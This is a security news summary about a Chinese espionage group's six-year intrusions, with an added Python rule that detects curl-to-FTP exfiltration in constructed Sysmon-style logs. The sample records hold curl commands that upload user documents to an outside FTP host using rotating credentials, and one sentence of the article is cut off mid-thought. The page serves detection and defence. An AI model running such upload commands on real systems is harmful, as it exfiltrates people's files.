Chinese hackers hide on military and govt networks for 6 years (Security News, May 2024)
Unfading Sea Haze attacks start with spear-phishing emails carrying malicious ZIP archives that contain LNK files disguised as documents.
In earlier attacks, the threat actor also used Ps2dllLoader, a tool that loads.
Interestingly, a custom tool checks for newly plugged USB and Windows Portable Devices every ten seconds and sends device details and specific files to the attackers.
To exfiltrate data from breached systems, Unfading Sea Haze uses a custom tool named 'DustyExfilTool' that sends the stolen data over TLS on top of TCP. More recent attacks show that the threat actor has switched to the curl utility and FTP for data exfiltration, logging in with dynamically generated credentials that are changed frequently.
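The switch to curl and FTP is easier to spot on the endpoint than the custom TLS tool, because it leaves a process-creation record with the full command line. The detection below is an added example written for this page, not code from the article or from Bitdefender's analysis. It runs over constructed, simplified stand-ins for Sysmon process-creation (id 1) and network-connection (id 3) records (the field names `host`, `image`, `cmdline`, `dst_ip`, `dst_port` are this example's own shorthand, not Sysmon's schema), flags curl uploads (`-T`/`--upload-file`) to `ftp://` targets, and counts how many distinct `-u` credentials each host used, since frequently rotated credentials are the other indicator the article mentions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). Each record is a simplified
# stand-in for a Sysmon event: id 1 = process creation, id 3 = network connection.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-017", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -u svc_8f2k:Qp9!xLm2 -T C:\\Users\\jdoe\\Documents\\plan.docx ftp://203.0.113.10/up/",
     "ts": "2024-05-20T01:02:03Z"},
    {"id": 3, "host": "WS-017", "image": "C:\\Windows\\System32\\curl.exe",
     "dst_ip": "203.0.113.10", "dst_port": 21, "ts": "2024-05-20T01:02:04Z"},
    {"id": 1, "host": "WS-017", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -u svc_k71q:Zz4#rTe8 -T C:\\Users\\jdoe\\Documents\\budget.xlsx ftp://203.0.113.10/up/",
     "ts": "2024-05-20T01:12:03Z"},
    # Benign curl download over HTTPS: must not fire.
    {"id": 1, "host": "WS-022", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -sSL https://example.org/updates.json -o updates.json",
     "ts": "2024-05-20T01:05:00Z"},
    # FTP from a normal client, not curl: outside this rule's scope.
    {"id": 3, "host": "WS-022", "image": "C:\\Program Files\\FileZilla FTP Client\\filezilla.exe",
     "dst_ip": "198.51.100.7", "dst_port": 21, "ts": "2024-05-20T01:06:00Z"},
]

FTP_PORTS = {21, 990}  # FTP control channel; 990 is implicit FTPS
# Real curl flags: -T/--upload-file sends a file, -u/--user supplies user:password.
UPLOAD_FLAG = re.compile(r"(^|\s)(-T|--upload-file)(\s|$)")
CRED_FLAG = re.compile(r"(^|\s)(-u|--user)\s+(\S+)")


def is_curl(image):
    """True if the image path's basename is curl (Windows or POSIX separators)."""
    return image.replace("/", "\\").split("\\")[-1].lower() in ("curl.exe", "curl")


def find_curl_ftp_exfil(events):
    """Return one finding per host where curl uploaded to an ftp:// URL.

    Each finding carries the number of upload commands, the number of distinct
    -u credentials seen (rotation indicator), and the FTP servers curl connected to.
    """
    uploads = defaultdict(list)
    creds = defaultdict(set)
    ftp_conns = defaultdict(set)
    for ev in events:
        if not is_curl(ev.get("image", "")):
            continue
        if ev["id"] == 1:
            cmd = ev["cmdline"]
            if "ftp://" in cmd.lower() and UPLOAD_FLAG.search(cmd):
                uploads[ev["host"]].append(cmd)
                m = CRED_FLAG.search(cmd)
                if m:
                    creds[ev["host"]].add(m.group(3))
        elif ev["id"] == 3 and ev.get("dst_port") in FTP_PORTS:
            ftp_conns[ev["host"]].add(ev["dst_ip"])

    findings = []
    for host in sorted(uploads):
        findings.append({
            "host": host,
            "uploads": len(uploads[host]),
            "distinct_credentials": len(creds[host]),
            "ftp_servers": sorted(ftp_conns[host]),
        })
    return findings


if __name__ == "__main__":
    for f in find_curl_ftp_exfil(SAMPLE_EVENTS):
        print(f)
```

Network-only hits (curl to port 21 without a matching upload command line) are deliberately left out of the finding; in practice they belong in a lower-severity rule, since passive-mode FTP data connections land on high ports and an upload can complete before a network event is written.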
Unfading Sea Haze shows stealth, persistence, and adaptability, leveraging fileless attacks, advanced evasion methods, and modular malware design.
Related news
- Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
- US says Chinese hackers breached multiple telecom providers
- Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services
- Microsoft: Chinese hackers use Quad7 botnet to steal credentials
- Sophos reveals 5-year battle with Chinese hackers attacking network devices
- Sophos Versus the Chinese Hackers
- FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions
- Chinese hackers exploit Fortinet VPN zero-day to steal credentials
- Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign
- Chinese hackers target Linux with new WolfsBane malware